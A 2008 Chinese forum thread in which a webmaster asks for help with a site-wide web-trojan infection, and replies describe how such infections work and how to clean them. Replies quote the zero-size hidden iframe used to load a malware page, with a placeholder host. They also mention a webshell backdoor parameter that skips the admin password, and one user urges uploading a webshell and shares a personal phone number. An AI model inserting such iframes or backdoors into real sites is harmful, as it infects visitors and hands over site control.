求解:网站被挂马的原因与解决方法?<未解决>
最近简单做了一个网站,全站被刮马,每打开一个页面都弹出一个播放器窗口 然后自动关闭(我另外一个在他子目录和另外一个在其他主机的网站(一样的程序模板)却没有此现象)
网站察看:[b][color=red][url=http://www.zhongguos.com/][b][color=red]点击[/color][/b][/url][/color][/b]
[b][color=#ff0000][/color][/b]
[color=black]自己水平有限,查找不出那里挂马,更不知道解决方法,求高手帮忙![/color]
[color=#000000][/color]
[color=#000000]虽然网站许久才更新一次,但是被挂马还是不好地![/color]
[color=#000000][/color]
(许多人说没挂马,我和几个人都提示有)
感谢 帮顶 用软件找一下跟本地大小不等的文件覆盖一下 要是用别人空间,先找空间商问问是不是他们的原因,,百度上也有好多解决挂马的方法,,实在不行,将整站下载到本地用卡巴之类的杀毒软在本地杀一下毒,,,清除病毒后再上传,当然要将以前的删除了,这样做有点麻烦,,网站空间体积太大此方法不太可行! 你这个情况应该是中马了,他利用的是real play的漏洞做的网马,现在这个马比较多!
我建议你查下你的JS文件。全站挂马用JS的手法居多
人家应该不会傻到每个页面加代码,这个手法容易被人看出来
webshell有批量挂马的功能,你可以先看下页面有没有这么一句代码
<iframe src=http://127.0.0.1/m.htm width=0 height=0></iframe>
中间那个127.0.0.1相应的就是他木马病毒站的地址!
没有这个代码的话就查JS文件
希望能帮到你
[[i] 本帖最后由 cpfthlb 于 2008-4-30 19:52 编辑 [/i]] *** 作者被禁止或删除 内容自动屏蔽 *** 我也是啊 我都郁闷死了
这些垃圾 杂种老是在我的站上挂木马
我教你清除方法:
用13的webshell 不过记得千万不要用网上下载下来那些加 了密的
要用一定用未加密的 如果你没有可以问我要
上传到你空间上 打开 然后 有清除木马 把你木马的
<iframe src=http://127.0.0.1/m.htm width=0 height=0></iframe>
内容复制粘贴到里面 然后 清除 就会所有都清楚掉
然后你在挂木马的方式把下面代码挂进整个站
<NOSCRIPT><IFRAME src='*/index.html' Width='0' Height='0'></IFRAME></NOSCRIPT>
我的站是 sosococo.cn 现在好多了 需要未加密的 webshell联系QQ:121617355
手机13732651142 LSD这么热心过头了啊,未加密的webshell多了去了
但是好多有后门,最常见的就是加了?web=admin这个代码
这样的结果就是可以不用输入密码直接进入网站后台
所以很多菜鸟拿了站却给别人做了嫁衣!
而且LZ的情况应该不会有人弱智到用这个代码挂马,具体解决办法我已经在上面说了哦 与我当初遇到的很类似,你可以看看我的解决方法
[url]http://www.im286.com/viewthread.php?tid=2529749[/url] 查挂吗的方法很多 说点个人心得吧!
1。要有经常看日志的习惯、修改程序的后台路径、数据库、检查附件文件等等!
2。如果使用的是自己托管的服务器的话,要经常检查自己机器的进口和出口及系统进程PID、服务,经常修改程序的后台路径、检查附件文件等等的权限,每隔一段时间修改一次管理员密码!
3。如果使用的是虚拟空间的话,那就很难说,如果在同一台虚拟主机上,别人的站挂马了,就算你的代码写得再安全,你的站也是很危险,个人建议尽量少去使用虚拟空间,现在VPS也很便宜,也有100多块钱,1500左右一年的吧,空间也有10G左右的,这个就个人需要吧!具体的VPS可以去网上搜下!
我以前做站的时候,就使用了1、2点,基本上只要不是遇到老鸟的话,那就行!
望能对你有帮助!要养成良好的安全检查习惯,不要亡羊补牢咯!
[[i] 本帖最后由 wenyan1232 于 2008-5-3 01:34 编辑 [/i]] 看你们说`我都怕了~
页:
[1]